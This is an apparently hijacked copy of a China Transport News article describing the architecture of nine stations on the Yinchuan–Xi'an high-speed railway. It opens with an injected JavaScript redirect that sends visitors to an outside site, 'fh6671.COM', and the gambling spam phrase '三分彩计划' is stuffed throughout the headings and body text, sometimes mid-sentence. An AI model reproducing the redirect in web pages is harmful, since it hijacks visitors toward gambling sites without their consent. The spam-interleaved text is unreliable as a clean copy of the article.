function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 直通地方

一站皆一景 银西高铁开通运营进入倒计时

2020-11-18 12:18:35 来源:中国交通新闻网 作者:石莹

三分彩计划伴随着动车组列车呼啸而过,银西高铁正在试运行阶段,线路开通运营也进入了倒计时!

三分彩计划由中铁广州局市政环保公司银西铁路甘宁段YXZF—1标承建的站房、生产生活房屋及相关工程位于甘肃及宁夏两省区境内,连接关天经济区、陇东地区和沿黄城市带,行经整个黄土高原。包括宁县站、庆阳站、庆城站、曲子站、环县站、洪德站、甜水堡站、惠安堡站、白土岗站等9座车站站房、雨棚、天桥、生产生活房屋及相关配套工程,贯穿银西铁路整个甘宁段,正线长度378公里。

宁县站

“古风新韵,宁县之窗”。宁县站位于甘肃省庆阳市宁县,站房建筑面积6996平方米。站房整体造型大气、古朴,取意“飞檐反宇,层楼叠榭”的意境,室内设计汲取宁县当地丰富的文化资源,以中国传统建筑大屋顶的形式出发,以现代的设计手法进行了表达,既有文化内核,又保持现代性,具有较高的艺术价值和文化辨识度。

庆阳站

庆阳站位于甘肃省庆阳市,站房建筑面积14996平方米三分彩计划,线侧平式站房,地上主体2层、两侧4层,局部地下1层,车场规模为3台7线。“苍茫厚土,大塬流觞”,利用现代建筑语汇,主体从黄土高原的自然环境和特色建筑出发,通过大气稳重的形体,将大塬的神韵表达出来,体现黄土高原的独有气质;主入口采用黄土地特有的形态——窑洞作为主题,更进一步突出建筑的地方特色;立面的两翼,利用立面开窗的虚实变换,写意出黄土地里夯土建筑的表面肌理,整体形象凝练大气,结合庆阳的气候特点,利用立面开窗虚实和角度变化,充分运用被动式节能手段;结合庆阳作为西北海绵城市试点的特点,将站房的屋顶、站前广场等区域进行绿建技术研究,实现雨水的收集和利用,有效改善微气候。

庆城站

三分彩计划庆城站位于甘肃省庆阳市庆城县,站房建筑面积,3000平方米。“农医之源、创新之门”。庆城站造型提取庆城地方建筑的特色,强化形成门的形象,作为高铁站房,成为庆城新的城市形象之门。厚重端庄,舒展大气,突显庆城站作为庆城门户的标志性地位。

曲子站

曲子站位于甘肃省庆阳市曲子镇,站房建筑面积1982平方米三分彩计划。曲子站位于庆阳市中心部位,环县、庆城、华池三县交界处,素有环县“南大门”之称。骨架轮廓以“门”的意向,同时又似张开的怀抱,隐喻着曲子的重要地理位置,以及开放友好的社会形态。外立面简洁大方,柱顶装饰以抽象的“曲子”图案。

环县站

环县站位于甘肃省庆阳市环县,站房建筑面积3000平方米三分彩计划。“皮影映窑,漫天星斗”,环县拥有丰富的地域窑洞文化和皮影文化。站房以“窑洞”为主题,融入西北地区特色的“皮影”意向,室内吊顶设计通过半圆形色彩格栅的区分,形成与外立面遥相呼应的窑洞形象,展现“皮影映窑”的地方特色;同时装饰灯光的设计中,散落且有序的布置筒灯,映射出“满天星斗”的灯光效果。

甜水堡站

三分彩计划甜水堡站位于甘肃省庆阳市环县,站房建筑面积1998平方米。设计立足于甜水堡悠久的历史,对秦汉时期的建筑形制进行研究,用现代建筑设计语汇将其转译成站房建筑形象,硬朗大气,简洁有力,建筑檐部以简洁的形式表达了秦汉斗拱的特质。

惠安堡站

惠安堡站位于宁夏回族自治区吴忠市盐池县,站房建筑面积3496平方米三分彩计划,线侧平式站房,地上主体1层、两侧2层,局部地下1层。“革命根据地,宁夏迎宾门”,体现了盐池开放的城市形象,融合古今气韵的惠安堡站,既展现了盐池纵贯千年的历史文化底蕴,又展示了盐池人开放包容、兼容并蓄的精神,它代表了盐池新的城市形象,并将成为盐池新的城市窗口。

三分彩计划“雕梁垂阴,魅力盐池”,站房室内设计汲取惠安堡当地丰富的文化资源,吊顶形式取自传统建筑的藻井形态,加上惠安堡物产中盐晶体的基本构型,以现代抽象的设计手法进行了表述,既有文化内核,又保持现代性。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。